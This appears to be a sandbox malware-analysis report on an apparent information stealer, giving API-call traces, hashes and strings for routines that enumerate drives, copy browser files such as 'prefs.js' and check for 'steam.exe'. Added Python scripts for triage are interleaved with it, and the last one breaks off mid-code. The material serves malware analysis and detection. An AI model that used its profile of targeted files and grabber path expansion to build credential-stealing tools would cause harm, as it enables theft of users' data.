• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
                                                                                                                                                                                                                                                          • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                          • API String ID: 441469471-147700698
                                                                                                                                                                                                                                                          • Opcode ID: b7ca6dd7ba7ad8189d2dce835c85c6f7fc5dfd9bf1be1ef6a46327d1d7b354aa
                                                                                                                                                                                                                                                          • Instruction ID: dbb2c5ab16e9c78ecf85d675a83c98555a197684b541912564ca906662078d64
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7ca6dd7ba7ad8189d2dce835c85c6f7fc5dfd9bf1be1ef6a46327d1d7b354aa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0513AB190021CAFDF319FA5CC85AEABBB9FF05744F004099EB48A6111EB359E88DF55
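The API ID above (drive-string and drive-type queries alongside wsprintf/lstrcat) together with the %DRIVE_FIXED% and %DRIVE_REMOVABLE% strings is the pattern of a routine that rewrites placeholder paths into one concrete path per drive of a given class. The following is an added illustration of that expansion, not code recovered from the sample: that the placeholders map onto the GetDriveType classes DRIVE_FIXED and DRIVE_REMOVABLE, and that a rule yields one path per matching drive, is an assumption, and the drive table is constructed for the demonstration.

```python
"""Expand %DRIVE_FIXED% / %DRIVE_REMOVABLE% placeholders in grabber-style paths.

Added illustration, not code recovered from the sample. It assumes (not
confirmed by the report) that each placeholder stands for every drive whose
GetDriveType class matches and that a rule containing a placeholder becomes
one concrete path per such drive.
"""
from typing import Iterable

# GetDriveType return values (winbase.h)
DRIVE_REMOVABLE = 2
DRIVE_FIXED = 3
DRIVE_REMOTE = 4
DRIVE_CDROM = 5

PLACEHOLDERS = {
    "%DRIVE_FIXED%": DRIVE_FIXED,
    "%DRIVE_REMOVABLE%": DRIVE_REMOVABLE,
}

# Constructed stand-in for what GetLogicalDriveStringsA + GetDriveTypeA
# would return on a host with two fixed disks, a CD-ROM and a USB stick.
SAMPLE_DRIVES = {
    "C:\\": DRIVE_FIXED,
    "D:\\": DRIVE_CDROM,
    "E:\\": DRIVE_REMOVABLE,
    "F:\\": DRIVE_FIXED,
}


def expand_rule_path(rule: str, drives: dict[str, int]) -> list[str]:
    """Return every concrete path a placeholder rule expands to.

    A rule without a placeholder is returned unchanged. A rule with a
    placeholder yields one path per drive of the matching class; drives of
    any other class (CD-ROM, network) are skipped, so a %DRIVE_FIXED% rule
    never touches an optical drive.
    """
    for token, wanted in PLACEHOLDERS.items():
        if token in rule:
            out = []
            for root, kind in sorted(drives.items()):
                if kind == wanted:
                    # root already ends in a backslash; drop it so the
                    # rule's own separator is not doubled.
                    out.append(rule.replace(token, root.rstrip("\\")))
            return out
    return [rule]


def expand_rules(rules: Iterable[str], drives: dict[str, int]) -> list[str]:
    """Expand a whole rule list, preserving rule order."""
    result: list[str] = []
    for rule in rules:
        result.extend(expand_rule_path(rule, drives))
    return result


if __name__ == "__main__":
    # Rule strings are constructed; they are not the sample's configuration.
    demo_rules = [
        "%DRIVE_FIXED%\\Users\\*.txt",
        "%DRIVE_REMOVABLE%\\*.kdbx",
        "%APPDATA%\\unchanged",
    ]
    for path in expand_rules(demo_rules, SAMPLE_DRIVES):
        print(path)
```

Running it against the constructed drive table turns the %DRIVE_FIXED% rule into a C: and an F: path, the %DRIVE_REMOVABLE% rule into an E: path, and leaves a rule with an unrelated placeholder alone, which is the shape of output to expect when reviewing a decoded grabber configuration.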
APIs
• wsprintfA.USER32 ref: 00FECF10
• FindFirstFileA.KERNEL32(?,?), ref: 00FECF27
• StrCmpCA.SHLWAPI(?,01016520), ref: 00FECF48
• StrCmpCA.SHLWAPI(?,01016524), ref: 00FECF62
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• lstrlenA.KERNEL32(00FED569,010158B5,01016528,?,010158AF), ref: 00FECFF5
• DeleteFileA.KERNEL32(?,01016540,010158B6,?,0101653C,01016538,01016534,01016530), ref: 00FED2D6
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FED2EA
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
  • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
  • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
  • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
  • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
  • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
  • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
• FindNextFileA.KERNEL32(?,?), ref: 00FED3F0
• FindClose.KERNEL32(?), ref: 00FED404
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
• String ID: %s\*.*
• API String ID: 3967855609-1013718255
• Opcode ID: 998b2dbb31734aaf263cb02a81077ad1402e68d8a66c150904c14fee5619e2ba
• Instruction ID: 77028e383c68ca412375b8ba9625977573f0466322f5a68a101ee8dee1c8d2d4
• Opcode Fuzzy Hash: 998b2dbb31734aaf263cb02a81077ad1402e68d8a66c150904c14fee5619e2ba
• Instruction Fuzzy Hash: 4DD19A3290116D9AEF60FB25DD42AED7774AF44300F4104E1AA08B7127DAB97F85AFC1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
• API String ID: 0-1562099544
• Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
• Instruction ID: f007c44e4c4bf333df918481b702c192f902f831696d9f049be4788adeca95a0
• Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
• Instruction Fuzzy Hash: 16E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
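The fragments "expa", "nd 3", "2-by" and "te k" in the String ID above are the 16-byte Salsa20/ChaCha20 constant "expand 32-byte k" (sigma) as a compiler emits it when the key-setup routine writes it with four 32-bit immediates rather than copying it from .rdata. Seeing it in the module mapped at 6CD10000 tells you only that one of those ciphers is compiled in; what it protects has to be confirmed in the debugger. The scanner below is an added example, not part of the report or the sample: it finds the constant both as a contiguous string and as four nearby immediates, also covering the 128-bit-key variant "expand 16-byte k" (tau), and runs on a byte blob constructed for the demonstration.

```python
"""Locate the Salsa20/ChaCha20 "expand 32-byte k" constant in a binary blob.

Added example, not code from the sample or from the report. The constant
appears either contiguously (as a string in .rdata) or as four 32-bit
immediates in the key-setup code, which is why the report lists it as
"expa", "nd 3", "2-by", "te k". SAMPLE below is constructed for the demo.
"""
import re

SIGMA = b"expand 32-byte k"   # 256-bit key
TAU = b"expand 16-byte k"     # 128-bit key
WORDS = [SIGMA[i:i + 4] for i in range(0, 16, 4)]  # b"expa", b"nd 3", b"2-by", b"te k"

# Constructed: x86 stores of the four immediates (mov dword ptr [esi+n], imm32;
# little-endian imm32 0x61707865 is the bytes "expa" in memory), then padding,
# then a contiguous copy of the constant as it would sit in .rdata.
SAMPLE = (
    b"\x90" * 16
    + b"\xc7\x06" + b"expa"          # mov dword ptr [esi],    0x61707865
    + b"\xc7\x46\x04" + b"nd 3"      # mov dword ptr [esi+4],  0x3320646e
    + b"\xc7\x46\x08" + b"2-by"      # mov dword ptr [esi+8],  0x79622d32
    + b"\xc7\x46\x0c" + b"te k"      # mov dword ptr [esi+12], 0x6b206574
    + b"\xcc" * 40
    + SIGMA
    + b"\x00" * 8
)


def _all_offsets(data: bytes, needle: bytes) -> list[int]:
    return [m.start() for m in re.finditer(re.escape(needle), data)]


def find_contiguous(data: bytes) -> list[tuple[int, str]]:
    """Offsets of the whole 16-byte constant, tagged sigma or tau."""
    hits: list[tuple[int, str]] = []
    for name, const in (("sigma", SIGMA), ("tau", TAU)):
        hits += [(off, name) for off in _all_offsets(data, const)]
    return sorted(hits)


def find_split_immediates(data: bytes, window: int = 64) -> list[int]:
    """Offsets of "expa" that have the other three words within `window`
    bytes but are not the start of a contiguous copy.

    A window of 64 bytes comfortably spans four mov instructions; widen it
    for code where the stores are interleaved with other key-setup work.
    """
    contiguous = {off for off, _ in find_contiguous(data)}
    others = [_all_offsets(data, w) for w in WORDS[1:]]
    anchors = []
    for off in _all_offsets(data, WORDS[0]):
        if off in contiguous:
            continue
        if all(any(abs(o - off) <= window for o in lst) for lst in others):
            anchors.append(off)
    return anchors


def scan(data: bytes) -> dict[str, list]:
    """Summary a triage script can act on."""
    return {
        "contiguous": find_contiguous(data),
        "split_immediates": find_split_immediates(data),
    }


if __name__ == "__main__":
    print(scan(SAMPLE))
```

On the constructed blob the scanner reports one contiguous sigma and one split occurrence at the first mov. Against a real dump, run it over each .sdmp file; a hit in the split form with no contiguous copy is the case the plain strings view in the report cannot show you.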
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,010165A4,010158DE,?,?,?), ref: 00FED7FB
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010165A8), ref: 00FED81C
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010165AC), ref: 00FED836
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,prefs.js,010165B0,?,010158DF), ref: 00FED8C2
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FED99C
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEDA67
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FEDB0A
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FEDB1E
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                                                                                                                                                                                          • String ID: prefs.js
                                                                                                                                                                                                                                                          • API String ID: 893096357-3783873740
                                                                                                                                                                                                                                                          • Opcode ID: 84fd528ce7583de5e26282625443cb4826e5342eb8c281a5377e8b1a9bfb6c0e
                                                                                                                                                                                                                                                          • Instruction ID: aeab9cc38a66d363c8d812df4f061cb283109da4f38e01d07620a7d1a7c7cf2e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84fd528ce7583de5e26282625443cb4826e5342eb8c281a5377e8b1a9bfb6c0e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78A1093290016C9BDB60FB25DC46BDD7374AF05310F8145E1EA08B7266DA79AF89AFC1
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,\*.*,01015833,?,?,?), ref: 00FEBAD5
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016470), ref: 00FEBAF6
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016474), ref: 00FEBB10
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FEBF45
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEBFBC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FEC02B
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FEC03F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
• String ID: \*.*
• API String ID: 2055012574-1173974218
• Opcode ID: 7d51386eea73b3ce7fdd049b0e5812ae9a062698b10364b49e76ff627a86f0c4
• Instruction ID: 6d1e5641952857588d0d2cdf8e3d1c9eaff09dcb67d391654026601db250c6ac
• Opcode Fuzzy Hash: 7d51386eea73b3ce7fdd049b0e5812ae9a062698b10364b49e76ff627a86f0c4
• Instruction Fuzzy Hash: 30E1833290016D9BCF60EB25DD46ADDB375AF44305F4144E1AA0877226DBB97F8AAFC0
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• FindFirstFileA.KERNEL32(?,?,01016458,0101582F,?,?,?), ref: 00FEB791
• StrCmpCA.SHLWAPI(?,0101645C), ref: 00FEB7B2
• StrCmpCA.SHLWAPI(?,01016460), ref: 00FEB7CC
• StrCmpCA.SHLWAPI(?,01016464,?,01015832), ref: 00FEB859
• StrCmpCA.SHLWAPI(?), ref: 00FEB8BA
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FEAD1F: CopyFileA.KERNEL32(?,?,00000001), ref: 00FEADC4
• FindNextFileA.KERNEL32(?,?), ref: 00FEBA25
• FindClose.KERNEL32(?), ref: 00FEBA39
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
• String ID:
• API String ID: 3801961486-0
• Opcode ID: 14e674afb6e9b5f10118622e5d9240fa2a3fada7c665ce4214bb5f4dad744dae
• Instruction ID: eee92c33a19db6e9fcf66bd372f7abe05eea9e37729d1f5655a8c5fcf03b6919
• Opcode Fuzzy Hash: 14e674afb6e9b5f10118622e5d9240fa2a3fada7c665ce4214bb5f4dad744dae
• Instruction Fuzzy Hash: 97811A3290055C8BCB60FB35EC46ADD7778AF04310F8145A1AE48B3216EB79AE49EFD1
APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 00FF2884
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF28A6
• Process32First.KERNEL32(00000000,00000128), ref: 00FF28B6
• Process32Next.KERNEL32(00000000,00000128), ref: 00FF28C8
• StrCmpCA.SHLWAPI(?,steam.exe), ref: 00FF28DA
• CloseHandle.KERNEL32(00000000), ref: 00FF28F3
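The two API sequences annotated above are the parts of this report an analyst would turn into detection logic: a directory walk (FindFirstFileA, StrCmpCA against the "." and ".." entries, FindNextFileA, FindClose) with CopyFileA reachable from a subcall, and a process-list walk (CreateToolhelp32Snapshot with dwFlags 00000002, Process32First/Process32Next with dwSize 00000128, StrCmpCA against "steam.exe"). The following script is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses annotation lines in the report's own "API.MODULE(args), ref: address" form and labels both behaviours. The bullet lines embedded in it are copied from the two blocks above; the regular expression, the record layout and the two heuristics are assumptions made here, and the constants TH32CS_SNAPPROCESS (0x2) and the 296-byte (0x128) ANSI PROCESSENTRY32 size are documented Windows values.

```python
"""Parse Joe Sandbox per-function "APIs" annotation lines and flag the two
stealer behaviours visible in this report.

Added example, not part of the Joe Sandbox report or of the analysed sample:
the bullet lines are copied from the report's annotation blocks; the regular
expression and the heuristics are assumptions made here.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Copied from the report: the process-enumeration function.
PROCESS_WALK = """\
• __EH_prolog3_catch_GS.LIBCMT ref: 00FF2884
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF28A6
• Process32First.KERNEL32(00000000,00000128), ref: 00FF28B6
• Process32Next.KERNEL32(00000000,00000128), ref: 00FF28C8
• StrCmpCA.SHLWAPI(?,steam.exe), ref: 00FF28DA
• CloseHandle.KERNEL32(00000000), ref: 00FF28F3
"""

# Copied from the report: the directory-walking function (a subset of its lines).
FILE_WALK = """\
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
• FindFirstFileA.KERNEL32(?,?,01016458,0101582F,?,?,?), ref: 00FEB791
• StrCmpCA.SHLWAPI(?,0101645C), ref: 00FEB7B2
• StrCmpCA.SHLWAPI(?,01016460), ref: 00FEB7CC
• StrCmpCA.SHLWAPI(?,01016464,?,01015832), ref: 00FEB859
• StrCmpCA.SHLWAPI(?), ref: 00FEB8BA
  • Part of subcall function 00FEAD1F: CopyFileA.KERNEL32(?,?,00000001), ref: 00FEADC4
• FindNextFileA.KERNEL32(?,?), ref: 00FEBA25
• FindClose.KERNEL32(?), ref: 00FEBA39
"""

# Assumed line format, derived from the lines above: optional subcall prefix,
# API.MODULE, optional "(args)", then ", ref: <8 hex digits>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
POINTER_RE = re.compile(r"[0-9A-F]{8}")  # unresolved arguments print as 8 hex digits

TH32CS_SNAPPROCESS = 0x2         # dwFlags value that snapshots the process list
SIZEOF_PROCESSENTRY32A = 0x128   # 296 bytes: the ANSI structure on 32-bit Windows


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the call sits inside a called subroutine


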